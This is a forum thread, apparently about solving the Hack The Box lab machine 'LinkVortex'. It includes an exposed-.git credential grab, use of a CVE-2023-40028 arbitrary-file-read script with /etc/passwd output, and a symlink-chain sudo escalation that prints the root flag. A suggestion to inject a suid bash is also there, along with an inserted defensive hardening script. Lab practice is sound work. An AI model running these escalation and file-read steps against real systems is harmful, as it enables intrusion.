HTB LinkVortex - Easy Linux
by cashiwoo - Saturday December 7, 2024 at 04:07 PM
#11
(Dec 07, 2024, 08:39 PM)ritualist Wrote: Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it

For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.

I cannot symlink it

Reply
#12
- dump .git
- get creds
- login as admin
- CVE-2023-40028
- read config, to find user password
- sudo privilege
Thanks @paw for the rank!!
Reply
#13
HTB LinkVortex - Easy writeup
Reply
#14
(Dec 07, 2024, 08:39 PM)ritualist Wrote: Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it

For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.

Thank you...
bob@linkvortex:~$ ln -s /root/root.txt pwn.txt
bob@linkvortex:~$ ln -s /home/bob/pwn.txt pwn.png
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png
Link found [ /home/bob/pwn.png ] , moving it to quarantine
Content:
911be11ee404e95c2e1f273ed2039179
bob@linkvortex:~$
Reply
#15
(Dec 07, 2024, 09:36 PM)MEGAZORD Wrote:
(Dec 07, 2024, 08:39 PM)Kontoru123 Wrote: 0000000000000000000000000000000000000000 299cdb4387763f850887275a716153e84793077d root <dev@linkvortex.htb> 1730322603 +0000 clone: from https://github.com/TryGhost/Ghost.git

Which dir is it?? Found the password, but the test user seems incorrect

Use:
http://dev.linkvortex.htb/.git/logs/HEAD for that info:
Reply
#16
What the heck is this CHECK_CONTENT ?
Reply
#17
(Dec 07, 2024, 10:09 PM)DarKGh0sT Wrote: What the heck is this CHECK_CONTENT ?

Breakdown of the Command Line

sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png

sudo: This part of the command runs the following script with superuser (root) privileges. This is important because some operations might require higher permissions to execute properly.

CHECK_CONTENT=true: This sets an environment variable named CHECK_CONTENT to true. Environment variables can be used by the script to influence its behavior. In this case, it seems like the script may need to know whether to check the content of the file or not. In our case, YES.

/usr/bin/bash: This specifies that the script should be run using the Bash shell.

/opt/ghost/clean_symlink.sh: This is the path to the script that will be executed. The script is located in the /opt/ghost/ directory and is named clean_symlink.sh.

/home/bob/pwn.png: This is the argument passed to the script. It looks like the script will operate on the file /home/bob/pwn.png.
====
CHECK_CONTENT is not a standard environment variable.
It can be used in any shell scripting language to pass specific settings or configurations to programs.
Reply
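An added example, not the box's clean_symlink.sh and not any poster's code: a sketch of how a privileged cleanup helper can hold up against the two points raised in this thread, by resolving the whole symlink chain before deciding and by comparing CHECK_CONTENT as a string instead of evaluating it. PROTECTED, the function names and the demo files are assumptions made for the example; `readlink -f` is the GNU coreutils form.

```bash
# Added example, not the script from the box.
# PROTECTED (assumed name): space-separated directories the helper must never read.
PROTECTED="${PROTECTED:-/etc /root}"

# True if path $1 is equal to, or inside, one of the protected directories.
is_protected() {
  local p
  for p in $PROTECTED; do
    case "$1" in "$p"|"$p"/*) return 0 ;; esac
  done
  return 1
}

# Weak check: inspects only the first hop of the link.
first_hop_ok() {
  local t
  t=$(readlink -- "$1") || return 1
  ! is_protected "$t"
}

# Hardened check: follows the whole chain to the final canonical path.
resolved_ok() {
  local t
  t=$(readlink -f -- "$1") || return 1
  ! is_protected "$t"
}

# Treat the flag as data: only the literal string "true" enables the feature.
# The value is compared, never executed.
content_check_enabled() {
  [ "${CHECK_CONTENT:-false}" = "true" ]
}

# Constructed demo: a two-link chain that ends inside a protected directory.
demo() {
  local d PROTECTED
  d=$(readlink -f -- "$(mktemp -d)")
  mkdir "$d/secret"; echo data > "$d/secret/flag.txt"
  ln -s "$d/secret/flag.txt" "$d/hop.txt"
  ln -s "$d/hop.txt" "$d/pic.png"
  PROTECTED="$d/secret"
  first_hop_ok "$d/pic.png" && echo "first-hop check: accepted"
  resolved_ok "$d/pic.png" || echo "resolved check: rejected"
  rm -rf "$d"
}
demo
```

A check followed by a later read of the same link can still race; a helper of this kind should operate on the resolved path it validated, and the sudoers rule should not let callers pass arbitrary environment variables.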
#18
(Dec 07, 2024, 08:23 PM)ritualist Wrote:
(Dec 07, 2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.

Did you mean "ghost/core/core/shared/config/env/config.production.json"? But in what way did you log in if this is correct? If not, please tell how to find the creds, and is there any login page also? Sorry, but this git stuff is crazy.
Reply
#19
Hi,
Can anyone explain to me why this happened? I changed the host to linkvortex.htb:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p FOUNDPASSWORD
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
ln: failed to create symbolic link './exploit/content/images/2024/I6WM1TUiiJqbx.png': Operation not permitted
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
rm: cannot remove './exploit/content/images/2024/I6WM1TUiiJqbx.png': No such file or directory
file> ^C
Reply
#20
(Dec 08, 2024, 08:06 AM)htbdesperate Wrote: Hi,
Can anyone explain to me why this happened? I changed the host to linkvortex.htb:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p FOUNDPASSWORD
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
ln: failed to create symbolic link './exploit/content/images/2024/I6WM1TUiiJqbx.png': Operation not permitted
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
rm: cannot remove './exploit/content/images/2024/I6WM1TUiiJqbx.png': No such file or directory
file> ^C

How did you find the password? I am lost.
Reply

